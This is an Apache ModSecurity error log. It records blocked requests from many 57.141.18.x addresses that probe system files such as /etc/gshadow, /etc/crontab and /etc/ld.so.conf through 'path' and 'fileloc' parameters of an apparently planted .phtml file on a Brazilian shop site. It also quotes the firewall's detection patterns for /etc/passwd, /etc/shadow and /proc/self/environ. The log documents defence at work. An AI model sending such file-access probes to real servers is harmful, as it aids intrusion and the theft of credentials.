[Thu Mar 19 13:23:15.436185 2026] [:error] [pid 30077:tid 140411574073088] [client 57.141.18.49:50694] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi8vu8EFLIOrSqIpu7kAAAAlQ"]
[Thu Mar 19 13:23:15.439785 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.30:50696] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi8uoXxyEfFpUF8f8gEAAAAUo"]
[Thu Mar 19 13:23:15.444393 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.70:50692] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi8ta6ubjKNq_cu4Zp4QAAA0I"]
[Thu Mar 19 13:23:15.847248 2026] [:error] [pid 31803:tid 140411624429312] [client 57.141.18.51:50720] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi8-yqAr6etmhZHNpzAwAAAE4"]
[Thu Mar 19 13:23:16.248414 2026] [:error] [pid 27403:tid 140411741927168] [client 57.141.18.14:50734] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi9BkFeYa1D6dYQnAEUgAAAcA"]
[Thu Mar 19 13:23:16.482776 2026] [:error] [pid 27293:tid 140411599251200] [client 57.141.18.47:50740] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi9P-YZRR_7pZ7nDKeyAAAA9E"]
[Thu Mar 19 13:23:17.054255 2026] [:error] [pid 14269:tid 140411574073088] [client 57.141.18.15:50750] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi9QbLMZ6AikZjR9VwpwAAABQ"]
[Thu Mar 19 13:23:17.661038 2026] [:error] [pid 26799:tid 140411548894976] [client 57.141.18.103:50760] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi9da6ubjKNq_cu4Zp5AAAA1c"]
[Thu Mar 19 13:23:17.675377 2026] [:error] [pid 31803:tid 140411590858496] [client 57.141.18.70:50762] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi9eyqAr6etmhZHNpzBAAAAFI"]
[Thu Mar 19 13:23:18.055844 2026] [:error] [pid 15826:tid 140411666392832] [client 57.141.18.73:50770] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi9uoXxyEfFpUF8f8gEgAAAUk"]
[Thu Mar 19 13:23:18.258550 2026] [:error] [pid 17653:tid 140411666392832] [client 57.141.18.71:50772] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi9sdf6f5d65gmYZSMYgAAAsk"]
[Thu Mar 19 13:23:18.947317 2026] [:error] [pid 27403:tid 140411607643904] [client 57.141.18.38:50784] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi9hkFeYa1D6dYQnAEUwAAAdA"]
[Thu Mar 19 13:23:19.183598 2026] [:error] [pid 30077:tid 140411590858496] [client 57.141.18.18:50788] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi9_u8EFLIOrSqIpu7kwAAAlI"]
[Thu Mar 19 13:23:19.276269 2026] [:error] [pid 27403:tid 140411565680384] [client 57.141.18.65:50792] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi9xkFeYa1D6dYQnAEVQAAAdU"]
[Thu Mar 19 13:23:19.769448 2026] [:error] [pid 26799:tid 140411582465792] [client 57.141.18.78:50802] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi99a6ubjKNq_cu4Zp5QAAA1M"]
[Thu Mar 19 13:23:19.970615 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.53:50806] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi99a6ubjKNq_cu4Zp5gAAA0A"]
[Thu Mar 19 13:23:20.529043 2026] [:error] [pid 14269:tid 140411582465792] [client 57.141.18.79:50816] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi-AbLMZ6AikZjR9VwqAAAABM"]
[Thu Mar 19 13:23:20.614722 2026] [:error] [pid 27403:tid 140411540502272] [client 57.141.18.53:50820] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi-BkFeYa1D6dYQnAEVwAAAdg"]
[Thu Mar 19 13:23:20.980093 2026] [:error] [pid 17887:tid 140411741927168] [client 57.141.18.84:50822] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi-AkwaGbbGflqUZDa7QAAAMA"]
[Thu Mar 19 13:23:21.482659 2026] [:error] [pid 17887:tid 140411658000128] [client 57.141.18.39:50838] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi-QkwaGbbGflqUZDa8AAAAMo"]
[Thu Mar 19 13:23:21.902074 2026] [:error] [pid 14269:tid 140411624429312] [client 57.141.18.80:50848] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi-QbLMZ6AikZjR9VwqQAAAA4"]
[Thu Mar 19 13:23:22.356461 2026] [:error] [pid 31803:tid 140411548894976] [client 57.141.18.106:50860] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi-uyqAr6etmhZHNpzBQAAAFc"]
[Thu Mar 19 13:23:22.455130 2026] [:error] [pid 17653:tid 140411649607424] [client 57.141.18.75:50862] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi-sdf6f5d65gmYZSMYwAAAss"]
[Thu Mar 19 13:23:22.741305 2026] [:error] [pid 30077:tid 140411582465792] [client 57.141.18.75:50872] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi-vu8EFLIOrSqIpu7lAAAAlM"]
[Thu Mar 19 13:23:23.298650 2026] [:error] [pid 30077:tid 140411557287680] [client 57.141.18.31:50888] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi-_u8EFLIOrSqIpu7lQAAAlY"]
[Thu Mar 19 13:23:23.868210 2026] [:error] [pid 15826:tid 140411632822016] [client 57.141.18.11:50900] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi--oXxyEfFpUF8f8gEwAAAU0"]
[Thu Mar 19 13:23:23.975490 2026] [:error] [pid 14269:tid 140411733534464] [client 57.141.18.53:50902] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi-wbLMZ6AikZjR9VwqgAAAAE"]
[Thu Mar 19 13:23:24.107916 2026] [:error] [pid 19093:tid 140411649607424] [client 57.141.18.17:50904] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi_F_V7PWP6ixUYl7P4AAAAos"]
[Thu Mar 19 13:23:25.579976 2026] [:error] [pid 30077:tid 140411716749056] [client 57.141.18.19:50914] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi_fu8EFLIOrSqIpu7lwAAAkM"]
